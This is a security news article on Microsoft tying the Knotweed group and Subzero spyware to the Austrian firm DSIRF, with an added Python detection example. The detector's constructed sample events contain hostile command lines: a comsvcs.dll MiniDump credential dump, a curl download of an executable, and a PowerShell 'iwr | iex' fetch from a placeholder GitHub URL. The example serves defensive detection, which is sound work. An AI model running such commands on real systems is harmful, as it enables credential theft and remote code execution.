The Austrian Company DSIRF Was Linked to the Knotweed Hack Group and the Subzero Malware

DSIRF linked to Knotweed

Microsoft has been told that the Knotweed hack group is linked to the Austrian spyware vendor DSIRF, which also often acts as a cyber mercenary. Researchers have determined that Knotweed is attacking European and Central American organizations using the Subzero malware toolkit.

Let me remind you that we also wrote that Experts linked BlackCat (ALPHV) ransomware to BlackMatter and DarkSide groups, and also that Evil Corp Ransomware Posing As PayloadBin Group To Avoid US Sanctions.

On its official website, DSIRF advertises itself as a company engaged in data analytics, cyber forensics, and data-driven intelligence. However, Microsoft associates the company with the Subzero malware, which DSIRF's clients can use to compromise targets' phones, computers, network devices, and so on.

Earlier, while studying the Knotweed attacks, the security company RiskIQ also found that the infrastructure that has been serving the malware since February 2020 may be associated with DSIRF, including the company's official website and domains that were probably used to debug and stage Subzero.

Now, Microsoft Threat Intelligence Center (MSTIC) analysts describe multiple links between DSIRF and the malicious tools used in Knotweed attacks: the C&C infrastructure used by the malware; a DSIRF-linked GitHub account that was used in one of the attacks; a code-signing certificate issued to DSIRF that was used to sign an exploit; and other public reports that tie Subzero directly to DSIRF.

Microsoft has studied some of the Knotweed attacks and discovered that they have targeted law firms, banks, and consulting organizations around the world, including Austria, the UK, and Panama.

“As part of the study of this malware and Microsoft’s communication with victims of Subzero, it turned out that the victims did not order pentesting or red teaming, which confirms that this was unauthorized and malicious activity,” Microsoft experts write.

On compromised devices, the attackers deployed Corelump, the main payload that ran from memory to avoid detection, as well as Jumplump, a heavily obfuscated loader that downloaded and loaded Corelump into memory.

The main Subzero payload has many features, including keystroke interception, screen capture, data theft, as well as launching remote shells and arbitrary plugins downloaded from the control server.

On compromised systems where Knotweed deployed its malware, Microsoft has observed various consequences of the breach, including:

  1. setting UseLogonCredential to “1” to enable plain text credentials;
  2. collection of credentials through comsvcs.dll;
  3. attempting to access emails with a credential dump from a Knotweed IP address;
  4. using Curl to download Knotweed tools from file shares, including vultrobjects[.]com;
  5. running PowerShell scripts directly from GitHub and an account associated with DSIRF.
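The five behaviours above are what a defender would hunt for in endpoint telemetry. The following is an added detection example, not Microsoft's or the blog's code: it runs simple rules over constructed Sysmon-style process-creation and registry events and flags each listed behaviour. The WDigest registry path, the command-line patterns (comsvcs.dll MiniDump, curl to vultrobjects.com, PowerShell fetching from raw.githubusercontent.com) and all sample events are assumptions of this example, not values from the report.

```python
# Sysmon-style event records: EventID 1 = process creation, EventID 13 = registry
# value set. The registry path and command-line patterns are assumptions derived
# from the behaviours Microsoft lists; the sample events are constructed telemetry.
WDIGEST_VALUE = r"control\securityproviders\wdigest\uselogoncredential"

def _cmd(ev: dict) -> str:
    # Lower-case the command line and restore defanged dots ("[.]") before matching
    return ev.get("CommandLine", "").lower().replace("[.]", ".")

def rule_wdigest(ev: dict) -> bool:
    # UseLogonCredential=1 makes WDigest keep plaintext credentials in LSASS memory
    return (ev.get("EventID") == "13"
            and ev.get("TargetObject", "").lower().endswith(WDIGEST_VALUE)
            and "0x00000001" in ev.get("Details", "").lower())

def rule_comsvcs_dump(ev: dict) -> bool:
    # comsvcs.dll exports MiniDump, which is abused to write a process memory dump
    cl = _cmd(ev)
    return ev.get("EventID") == "1" and "comsvcs.dll" in cl and "minidump" in cl

def rule_curl_share(ev: dict) -> bool:
    # curl fetching from the file-share domain named in the report
    cl = _cmd(ev)
    return ev.get("EventID") == "1" and cl.startswith("curl") and "vultrobjects.com" in cl

def rule_ps_github(ev: dict) -> bool:
    # PowerShell pulling a script straight from GitHub's raw-content host
    return (ev.get("EventID") == "1" and "powershell" in ev.get("Image", "").lower()
            and "githubusercontent.com" in _cmd(ev))

RULES = [("wdigest_plaintext_enabled", rule_wdigest), ("comsvcs_minidump", rule_comsvcs_dump),
         ("curl_from_vultrobjects", rule_curl_share), ("powershell_script_from_github", rule_ps_github)]

def scan_events(events: list) -> list:
    # Returns (RecordId, rule name) for every rule that fires on each event, in order
    return [(ev["RecordId"], name) for ev in events for name, rule in RULES if rule(ev)]

SAMPLE_EVENTS = [  # constructed sample telemetry: one benign event, then one per behaviour
    {"RecordId": "1", "EventID": "1", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe report.txt"},
    {"RecordId": "2", "EventID": "13", "Image": r"C:\Windows\System32\reg.exe", "Details": "DWORD (0x00000001)",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"},
    {"RecordId": "3", "EventID": "1", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <args omitted>"},
    {"RecordId": "4", "EventID": "1", "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl -o C:\Users\Public\tool.exe https://example.vultrobjects[.]com/tool.exe"},
    {"RecordId": "5", "EventID": "1", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -c "iwr https://raw.githubusercontent.com/PLACEHOLDER/run.ps1 | iex"'},
]
```

Calling scan_events(SAMPLE_EVENTS) returns one (record id, rule name) pair for records 2 to 5 and nothing for the benign record 1; in practice the rules would be fed from a Sysmon or EDR export rather than the inline list.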

Among the 0-day vulnerabilities that Knotweed used in its campaigns, Microsoft highlights the recently fixed CVE-2022-22047, which allowed attackers to elevate privileges, escape the sandbox and achieve system-level code execution.

In addition, last year Knotweed used an exploit chain consisting of two Windows privilege escalation vulnerabilities (CVE-2021-31199 and CVE-2021-31201) in combination with an exploit for an Adobe Reader vulnerability (CVE-2021-28550). All these bugs were fixed in June 2021.

Also in 2021, the group was associated with the exploitation of a fourth 0-day vulnerability, a privilege escalation in the Windows Update Medic Service (CVE-2021-36948), which was used to force the loading of an arbitrary signed DLL.

“To limit these attacks, we have released an update that aims to reduce the exploitation of vulnerabilities, as well as published malware signatures that will protect Windows users from Knotweed exploits that are used to deliver malware. We are increasingly seeing how private sector offensive security companies sell their tools to authoritarian regimes that operate against the letter of the law and human rights norms and use them to attack human rights defenders, journalists, dissidents and other members of civil society,” Microsoft representatives write.

By Vladimir Krasnogolovy

